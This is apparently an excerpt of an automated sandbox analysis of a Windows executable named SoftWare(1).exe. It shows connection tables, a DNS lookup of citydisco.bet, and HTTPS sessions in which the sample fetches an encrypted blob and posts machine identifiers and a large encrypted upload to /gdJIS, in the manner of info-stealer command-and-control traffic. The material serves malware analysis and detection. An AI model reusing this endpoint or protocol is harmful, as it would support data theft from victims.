                                                            Mar 13, 2025 07:45:08.932483912 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:10.660356998 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:10.660430908 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:10.661859035 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:10.661871910 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:10.662101030 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:10.663521051 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:10.663676023 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:10.663707972 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:11.435312986 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:11.435429096 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:11.435488939 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:11.435796976 CET49713443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:11.435806036 CET44349713188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:11.664345980 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:11.664386034 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:11.664480925 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:11.664901018 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:11.664923906 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:13.392617941 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:13.392735958 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:13.395016909 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:13.395025015 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:13.395262003 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:13.404597044 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:13.408680916 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:13.408726931 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:13.411998034 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:13.412014961 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:14.294517040 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:14.294629097 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:14.294723034 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:14.294858932 CET49716443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:14.294878006 CET44349716188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:14.570910931 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:14.570974112 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:14.571038961 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:14.571337938 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:14.571353912 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:16.380682945 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:16.380875111 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:16.382086039 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:16.382110119 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:16.382338047 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:16.383569002 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:16.383697987 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:16.383721113 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:17.462737083 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:17.462832928 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:17.462894917 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:17.463258028 CET49718443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:17.463305950 CET44349718188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:17.629617929 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:17.629661083 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:17.629765034 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:17.630134106 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:17.630145073 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:19.456332922 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:19.456439972 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:19.458182096 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:19.458220005 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:19.458472013 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:19.488012075 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:19.488151073 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:19.488171101 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:20.237694025 CET44349720188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:20.241576910 CET49720443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:20.267668962 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:20.267709017 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:20.267781019 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:20.268146992 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:20.268157005 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.058336020 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.058422089 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.061335087 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.061342955 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.061594009 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.106676102 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.109796047 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.109863043 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.109890938 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.830410957 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.852636099 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.852713108 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.852842093 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.852864981 CET44349727188.114.97.3192.168.2.4
                                                            Mar 13, 2025 07:45:22.852875948 CET49727443192.168.2.4188.114.97.3
                                                            Mar 13, 2025 07:45:22.852884054 CET44349727188.114.97.3192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 13, 2025 07:45:03.610241890 CET5987953192.168.2.41.1.1.1
                                                            Mar 13, 2025 07:45:03.624186039 CET53598791.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Mar 13, 2025 07:45:03.610241890 CET192.168.2.41.1.1.10x78e4Standard query (0)citydisco.betA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Mar 13, 2025 07:45:03.624186039 CET1.1.1.1192.168.2.40x78e4No error (0)citydisco.bet188.114.97.3A (IP address)IN (0x0001)false
                                                            Mar 13, 2025 07:45:03.624186039 CET1.1.1.1192.168.2.40x78e4No error (0)citydisco.bet188.114.96.3A (IP address)IN (0x0001)false
                                                            • citydisco.bet
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449711188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:05 UTC263OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 97
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:05 UTC97OUTData Raw: 75 69 64 3d 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 26 63 69 64 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                            Data Ascii: uid=ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929&cid=b9abc76ce53b6fc3a03566f8f764f5ea
                                                            2025-03-13 06:45:05 UTC778INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:05 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 12882
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aPdIONAGVsprJzgE6Uo7zWgQNlf2885RjJ46dpP457E5i%2Fzw87NX%2BAdHJNuAxymLRdMUwkKEz2Xj1dKlc18YZJbyiM4KaOvFTi2cwvJaUecuFHv%2B2TdaJFaHSUUztjF"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f9910569801786-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=19049&min_rtt=16945&rtt_var=6653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=996&delivery_rate=170845&cwnd=241&unsent_bytes=0&cid=e5e5d0440609e8b7&ts=764&x=0"
                                                            2025-03-13 06:45:05 UTC591INData Raw: b9 e1 0b ce 3d f8 c2 a3 30 dc 57 91 b1 d9 58 a6 88 03 69 51 76 12 43 3f c6 05 5b 00 90 33 75 38 66 2d a5 f7 b2 ed 17 bc 72 4a a1 79 28 0c 0e dd d5 bc 24 fc bc b9 98 01 3e 4f 4f 8d 75 3d 14 c9 69 30 1b 8e 92 a1 70 70 2b 57 a8 3b ab 59 d0 8b ba 77 fe c5 09 f1 cb 3c 06 f5 f5 06 a0 ce 5d 6a 4a 4a 81 35 56 61 b8 ba 5e dc 25 53 57 25 02 3f 2e af aa b8 5f aa 36 63 48 bb d2 e0 8f d4 31 f9 d8 74 cd b1 ef ad 19 72 0a e4 02 6d 08 df 90 df 9e 31 26 cd 5d 4a fe d4 14 5f 91 05 65 46 99 82 f1 77 60 09 f5 f8 d8 2a e7 06 52 ae 18 a3 e4 81 25 55 54 3d 6c f3 91 85 0e f6 ca e3 b1 46 9b 4a 14 5e f9 e3 85 3f eb b5 be 2f 34 21 16 f8 06 70 dc 23 2c 1f 8d a8 40 6a c3 48 88 d8 c4 7d 8e 53 ed c5 d9 6e dc 63 77 db 7a 89 04 0c 37 d6 65 d3 a3 af 90 28 91 b5 ee e6 4b ad 68 0a 89 57 df
                                                            Data Ascii: =0WXiQvC?[3u8f-rJy($>OOu=i0pp+W;Yw<]jJJ5Va^%SW%?._6cH1trm1&]J_eFw`*R%UT=lFJ^?/4!p#,@jH}Sncwz7e(KhW
                                                            2025-03-13 06:45:05 UTC1369INData Raw: fa 9b 52 a8 f2 1a 1d d5 e0 53 6b 79 29 25 cc ad d7 18 e1 ec 70 fa dc 65 63 71 4d 41 b3 84 c4 78 34 b8 52 0e d0 fa aa b4 2a d9 6f fd 10 e4 fe 0b 8b f5 eb 47 9a c0 21 2f b1 2e 20 ee c0 c6 83 d8 59 3a 7e 18 78 69 27 13 aa f4 85 e0 8d c0 30 58 90 94 76 3d b7 5e de 04 50 e6 0c 36 a8 a4 3d 62 43 ad c0 ba 89 5e 9e 19 7e a3 ab 57 25 63 3d 32 d1 6e 2b 8f a3 6e 1b a2 9f f0 d5 94 39 90 9f 31 1c b9 10 5c 6d 89 ec 7b 75 0d c8 4d 85 46 07 d2 bc de 1d 6b 89 5b 9f e3 c6 cb 58 fc 3a b6 66 db b8 09 1f ad 05 26 14 08 a0 2b 86 7c e2 5f 4c 6f e1 cf ad f7 f9 36 65 e2 e2 4d 29 47 1a f9 fa 81 b8 34 ab 27 89 e0 92 ec 1f eb 5c b1 90 03 12 93 95 ee 6e 52 62 bd 16 6a da 72 0b 73 5d 72 87 f2 ab 01 47 c6 9b 64 27 52 9a d3 98 e4 d3 68 72 6a 45 fa df d9 bb c6 31 54 d3 2f 33 58 54 4e 6f
                                                            Data Ascii: RSky)%pecqMAx4R*oG!/. Y:~xi'0Xv=^P6=bC^~W%c=2n+n91\m{uMFk[X:f&+|_Lo6eM)G4'\nRbjrs]rGd'RhrjE1T/3XTNo
                                                            2025-03-13 06:45:05 UTC1369INData Raw: 7b 77 ac a0 a9 6b 41 e4 b9 6e b8 e0 c3 38 f0 fd b9 65 0a 2c e1 c2 d3 9f 55 3f 61 0d e1 40 45 eb 20 f3 0a 8d 07 8a 5e f7 36 99 bf ab 2f 7e f0 a7 4c d3 1b 17 d0 d5 0b f4 2b fd 33 50 e7 ab 51 e2 9c 3c 53 6a 9d fe 9d 6f 7a 12 eb 92 80 9a 7b 33 36 64 d2 64 c5 5b 52 6b 5a 40 ef 5f 9a 92 ad b1 4a 13 c5 50 80 e3 2f df d5 2d 04 eb 07 b0 3a 8a 7f b6 a6 ec 58 31 11 d2 98 b5 8d 22 71 2e bc 9f b7 3d 6b 21 bf d4 e0 50 00 34 f3 2e 27 43 6c a1 6f c8 58 91 89 95 7e 8e f6 3e 6d b6 a3 76 53 db 00 54 74 df 36 16 fb a1 af 11 83 67 c4 2d 92 02 60 56 72 2a c0 ce 2d 6e 17 3c 15 ae c3 98 77 b9 80 fe 18 f0 7c 4d c8 fe 6a 69 7b d5 65 49 86 b0 69 68 39 1f 86 4f c3 78 17 c4 11 59 db 52 d5 57 c0 44 84 90 59 92 45 00 45 e0 fe e9 06 46 45 12 b4 2c dd 17 0a 67 33 d9 c5 b9 61 94 20 b1 42
                                                            Data Ascii: {wkAn8e,U?a@E ^6/~L+3PQ<Sjoz{36dd[RkZ@_JP/-:X1"q.=k!P4.'CloX~>mvSTt6g-`Vr*-n<w|Mji{eIih9OxYRWDYEEFE,g3a B
                                                            2025-03-13 06:45:05 UTC1369INData Raw: f9 dd 86 9f 4d a4 30 c0 e8 3b 90 7d 1f 40 27 2d f4 21 6d a0 ab f5 59 e5 3a 23 47 5c 99 7e ec a1 ed c0 5b 90 6a 07 22 73 b8 26 2b 20 7e 83 7a bc 03 62 5b 44 3b 75 58 ad ee a2 1e 5f 97 1e 0f 44 fa 5e 2e 29 4b aa 4c ba 53 15 e7 a2 ba 83 c6 a6 74 8a 18 c1 a3 1d 29 65 b0 f6 51 95 dc a0 67 33 4e 8d b1 b3 08 92 28 d3 ae 43 dc e0 75 27 7a 32 27 fb d1 19 4e 4f 67 e6 54 86 e4 bd a3 cd 64 dc 2b e2 d2 86 6b 88 d3 c8 f6 11 a6 3f 3e fe 58 d0 e1 29 48 a3 ea 8c b7 dd fe 6d ee 2c a0 cc 56 df f2 94 b4 38 93 77 8c 87 8f 00 e3 47 9d 64 ff 43 1b 09 02 1f ab 58 4f 70 dc 9d e4 7b a8 ec 10 b9 f9 3f 59 53 96 46 34 2c ec ce 85 ea 18 7c 01 9d dd 8c dd 28 17 b0 48 2f 5f c9 f0 68 23 58 83 7d 35 a3 78 77 6d 73 34 e0 85 0f 3b 92 c8 b5 e9 cc ef d3 da 1d 66 b3 2c 38 e1 6a dd 10 87 b6 8c
                                                            Data Ascii: M0;}@'-!mY:#G\~[j"s&+ ~zb[D;uX_D^.)KLSt)eQg3N(Cu'z2'NOgTd+k?>X)Hm,V8wGdCXOp{?YSF4,|(H/_h#X}5xwms4;f,8j
                                                            2025-03-13 06:45:05 UTC1369INData Raw: a6 27 38 a1 1d 43 3d 9e 2c 94 da 7e d6 39 70 52 0f 45 42 f4 7c 83 ff d8 d9 e4 3d e3 02 b2 df e2 87 39 83 4b 8c 7a ac 3b 1e 0d 14 da 78 bf b5 5e 3f 65 ce a7 b3 16 82 ee 5e 6b 19 37 ac 01 76 7b b5 44 fa a3 39 29 8a ae b8 9c ed 7b c6 3d c8 b9 9f 1a d8 d2 af 68 c9 96 58 9c 8f 9f c6 50 fd aa b3 95 fe 2a 14 57 d6 00 38 14 8e cc 8a cf 17 c0 6f c3 89 34 f7 9b cb a6 06 59 5b 2c 47 ea 9d fb 9a 0f 38 11 84 99 08 f3 c6 17 02 88 b0 9d 2a 32 13 bb f5 e3 0a 05 d7 17 81 d3 23 64 b4 4c 52 3b 9b e9 29 81 75 76 25 c3 69 3f 6e 52 33 e7 10 d1 2a 22 7b e2 62 35 4c 02 e3 1c 7c a5 40 02 73 51 83 c0 d9 7a ab fd ef ff 27 4b 2a 20 c4 f9 7f e0 58 34 b4 30 2e 43 51 c9 0c be f3 01 64 5f e7 fd 27 6a 14 d6 44 cc 5b 03 e8 c9 59 1f 8e cf b5 6f 08 0a 65 6d 84 31 4b 14 66 93 da 16 db 08 22
                                                            Data Ascii: '8C=,~9pREB|=9Kz;x^?e^k7v{D9){=hXP*W8o4Y[,G8*2#dLR;)uv%i?nR3*"{b5L|@sQz'K* X40.CQd_'jD[Yoem1Kf"
                                                            2025-03-13 06:45:05 UTC1369INData Raw: d3 47 06 62 a0 00 c7 e4 e6 91 ce 3c 1b ad b4 53 3c 4c eb 9e ba ea 90 99 ed eb de 3b 1a 45 05 50 ca 20 1d 9c 25 82 fd 18 e6 8b a7 52 71 69 5a 60 b5 4d 07 2d 13 fb 4a b6 7e d2 7b 25 7e a6 be 96 bd d0 83 d2 85 f8 d5 09 32 fb c3 17 3b 45 58 ee 1a c2 90 73 79 d5 ae 7f 9c 48 7d ac ef 68 8c 65 7d d1 dd 3e 6d fb a9 70 39 00 9d 82 96 ff 95 da 27 3e 32 21 65 7e 80 db 33 12 22 80 78 3d 53 f6 0f e1 e8 13 0e b9 f6 c1 31 2a ab f2 c0 10 21 e9 c4 68 30 ea f5 3c 1d 3e ce 97 41 bf 83 09 d5 31 28 0e 0e e7 5e c7 4f fe a8 f4 84 79 20 c4 87 0e 0c 67 31 d8 90 e4 ce 72 40 70 50 43 b0 51 54 70 a2 70 c7 1b 63 0e c9 f2 e5 13 89 0c c3 06 9d eb 4b 49 d4 60 40 30 4a 78 bf 1f d2 1d d2 dc 7d 81 99 f7 cd 7d 53 d1 46 48 10 7e 1a cd 82 91 51 eb 36 a6 a2 ef 8f 5e 0e 76 71 77 f7 c3 cb 77 35
                                                            Data Ascii: Gb<S<L;EP %RqiZ`M-J~{%~2;EXsyH}he}>mp9'>2!e~3"x=S1*!h0<>A1(^Oy g1r@pPCQTppcKI`@0Jx}}SFH~Q6^vqww5
                                                            2025-03-13 06:45:06 UTC1369INData Raw: 3f 1d 4d c8 86 67 d5 83 b9 ee 5e ca 4d 07 d6 75 83 d1 3a 0e 40 36 a1 39 92 33 75 2d ca 0c c4 0b 8b b2 3f a8 37 14 58 b0 cf 27 91 27 dc 29 97 1b 49 c6 00 7a f5 4a 59 c7 e9 73 8d 70 c0 db 80 f0 b4 17 ce 8f bf 03 4e 86 ad 6f 6e d2 cb 9f 59 43 4e b4 ff 83 a8 22 76 9f 38 32 ce 73 df 80 5f b0 a0 d8 bb 01 26 0c 2b 82 fd f4 73 40 7c c4 56 87 79 b0 8d 6f f5 d7 64 88 23 26 82 81 51 ca 99 98 5d 67 67 d4 56 62 5a a2 6d 59 d8 02 39 07 ee 0c 27 6d 42 93 26 24 fb 14 92 db 56 bc ee 90 49 ba 58 75 ec 57 22 f8 e7 dd c5 87 a8 28 4d 2c 3b 6d 88 d5 e7 e0 12 43 59 97 f6 b1 32 f5 fd d1 cb e4 01 dd 8a ab 96 31 5d 15 6f f9 d3 e9 a5 61 89 d5 6c 88 95 94 16 7b 67 df e1 38 d8 37 0b 9e 09 eb c0 a1 2a 48 40 cb f0 bc f7 7b a4 35 2d ad ef 12 e1 4b 5e 5a e6 5b fe 63 b3 b8 f1 39 9e a2 48
                                                            Data Ascii: ?Mg^Mu:@693u-?7X'')IzJYspNonYCN"v82s_&+s@|Vyod#&Q]ggVbZmY9'mB&$VIXuW"(M,;mCY21]oal{g87*H@{5-K^Z[c9H
                                                            2025-03-13 06:45:06 UTC1369INData Raw: dd a6 4a ed bb 0a dd 8f 96 95 b9 30 4c b6 18 d8 54 38 6a 6d dc 1f 25 0c b1 74 73 3a 88 d7 5e 69 dd 0d 03 30 09 d7 bd d8 ac a8 47 21 d3 b2 a4 77 23 8b a3 c3 68 1b 34 74 c6 cf 2b a6 80 97 c8 86 a3 d2 e3 03 2d 47 2d 0c db 3e 71 d4 76 64 90 e9 fb 89 8d 76 b0 c6 04 f8 61 2a 82 40 bb 11 9a 53 2f b8 d7 a0 2c b8 3e fe cf 1e d2 fa c7 7e 50 b6 7d b0 ec e4 a6 40 a8 d2 c0 f8 2f bd 7a 18 d2 e3 6c 5a 19 c3 b7 37 2b 27 cb 13 64 4c a1 fe bc df 31 f6 5d dc 1b c3 3e 2a 0b d7 95 43 bd 0f 5c 16 91 36 ac 8a 3b 46 44 32 2b 88 22 2a 9b ef dd 21 3d 2e f5 c6 97 38 46 23 9c ae 5c e5 d4 0f fd 49 69 bf 51 c4 11 ac a9 4f 54 57 86 cf 48 d8 21 6d 0f bf b1 f9 3a 93 bb 38 e0 7b e2 79 27 2b b5 3f 67 c5 41 8a 09 fc cd 8d c7 c6 d8 a2 4e 33 b8 6f 6d 72 cd c9 ca 68 20 10 b6 a0 5c 5d d8 56 e7
                                                            Data Ascii: J0LT8jm%ts:^i0G!w#h4t+-G->qvdva*@S/,>~P}@/zlZ7+'dL1]>*C\6;FD2+"*!=.8F#\IiQOTWH!m:8{y'+?gAN3omrh \]V
                                                            2025-03-13 06:45:06 UTC1369INData Raw: 32 78 8f 78 d1 4d d4 34 ef d7 ef 84 00 68 7c 34 e1 c2 c2 b8 92 e5 9e ae 9c 1e dc 23 b6 4a 10 8e 55 16 41 a0 79 cb 20 ca 6e c7 87 df b3 04 5e 51 32 c7 ed b3 99 42 46 94 6d ee 09 3c 0f 32 fa cb 79 0c 38 f5 d6 d7 1b 8c 97 68 1b c1 09 a5 4b 7e 62 39 c4 71 30 d1 de 85 b0 49 48 5c 2d 3f ee ad 97 86 79 9a 4b a6 ff 95 0f 42 24 73 52 41 9e 0f 8f 1b d4 b7 a1 9c d9 12 11 29 8d 85 3d 25 36 c1 ca c0 81 4a f1 70 96 b2 5a 05 59 bc ee d2 87 9b ea 60 51 b5 6c 0a 69 50 83 43 38 b7 d9 a5 07 7a c7 06 0e 1b 78 ff db 4e b8 13 10 c6 27 d1 e8 ba 62 78 ef 9d 0a f7 4d 75 2d ba b5 71 17 7a dd 5c 58 45 67 75 21 b0 59 e8 8c e3 7f c8 a1 ed f0 51 9e 6b 28 4e d7 ac 7c 36 74 76 b9 a3 c1 96 2c 9a ff 43 ee c1 6a 44 72 f8 91 1b 9a 6d 3a 6b 74 5e ee 38 98 e2 8b 6b f7 df d6 74 28 45 bd b3 b5
                                                            Data Ascii: 2xxM4h|4#JUAy n^Q2BFm<2y8hK~b9q0IH\-?yKB$sRA)=%6JpZY`QliPC8zxN'bxMu-qz\XEgu!YQk(N|6tv,CjDrm:kt^8kt(E


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449712188.114.97.34436460C:\Users\user\Desktop\SoftWare(1).exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-13 06:45:07 UTC276OUTPOST /gdJIS HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=OEs7aqO56MrGf
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 19610
                                                            Host: citydisco.bet
                                                            2025-03-13 06:45:07 UTC15331OUTData Raw: 2d 2d 4f 45 73 37 61 71 4f 35 36 4d 72 47 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 65 37 32 39 66 34 61 65 35 66 35 30 36 31 64 62 66 36 38 33 65 35 34 65 34 32 32 38 39 39 62 37 30 36 34 62 66 63 31 62 38 33 61 34 38 32 36 36 64 33 65 39 39 32 39 0d 0a 2d 2d 4f 45 73 37 61 71 4f 35 36 4d 72 47 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 45 73 37 61 71 4f 35 36 4d 72 47 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 43 37
                                                            Data Ascii: --OEs7aqO56MrGfContent-Disposition: form-data; name="uid"ee729f4ae5f5061dbf683e54e422899b7064bfc1b83a48266d3e9929--OEs7aqO56MrGfContent-Disposition: form-data; name="pid"2--OEs7aqO56MrGfContent-Disposition: form-data; name="hwid"62C7
                                                            2025-03-13 06:45:07 UTC4279OUTData Raw: e3 c6 a9 9c c0 81 e2 27 b7 eb b9 cd 24 68 e2 6b dc d4 92 aa d8 2b 33 2a 89 1d e2 71 3f 1b d1 ec 1a a3 5e 16 79 af 11 70 2c 21 65 4e 13 6f 21 78 8f c0 59 1c a6 b1 12 cd 35 76 9b 74 49 0a a1 c4 13 15 eb 45 4c 61 31 ff dd 50 58 98 6f e3 cd 90 01 a2 68 21 41 21 2a 06 1b 37 aa c1 e9 2f 35 59 66 75 df 10 04 14 b3 fc b4 cc 4d 9b c0 e0 6c c4 7c 2b 0c 3c e2 e2 7c 99 5d 4a 86 32 7a 79 e4 cc 0f 1d 86 15 c5 8a 01 0e 06 f2 59 de e5 ba ef b7 0a 4c 52 81 c5 ee de e6 1d 31 77 72 60 bf ea e0 ea 90 16 65 c1 45 1d 80 af 84 e7 f7 ab db c9 f5 1c 65 e9 00 43 f4 e8 a3 1d 84 d8 29 7b dc f8 35 f0 78 8f 79 b7 e6 eb a5 e7 bf 64 52 2a 0e a1 5e d3 43 1b 8c 4b af 95 28 d6 f9 ab 23 7a b2 7b 3a 8e fb 12 fe 20 2b cf 41 b9 72 29 ee 73 5c 06 70 19 04 5c 19 c0 76 f4 df de c6 36 f4 ec 0e 4c
                                                            Data Ascii: '$hk+3*q?^yp,!eNo!xY5vtIELa1PXoh!A!*7/5YfuMl|+<|]J2zyYLR1wr`eEeC){5xydR*^CK(#z{: +Ar)s\p\v6L
                                                            2025-03-13 06:45:08 UTC810INHTTP/1.1 200 OK
                                                            Date: Thu, 13 Mar 2025 06:45:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4bnxzceIkzs9Bbk%2Fwdr1zszZIyMoUSnJYnu%2BzrAqoQzRJqzjjj8N6lCl9BI8uJmDo0x1KR3ov3edjDmjdPWimfHg86PVBhh2LLGuKulCkUSx%2BngwkwXZMcRMfkWtwnQ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91f9911599bfd643-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=19223&min_rtt=16522&rtt_var=7070&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20566&delivery_rate=175217&cwnd=249&unsent_bytes=0&cid=ab220f5b4152af52&ts=970&x=0"
                                                            2025-03-13 06:45:08 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 33 2e 38 31 2e 31 31 33 22 7d 7d 0d 0a
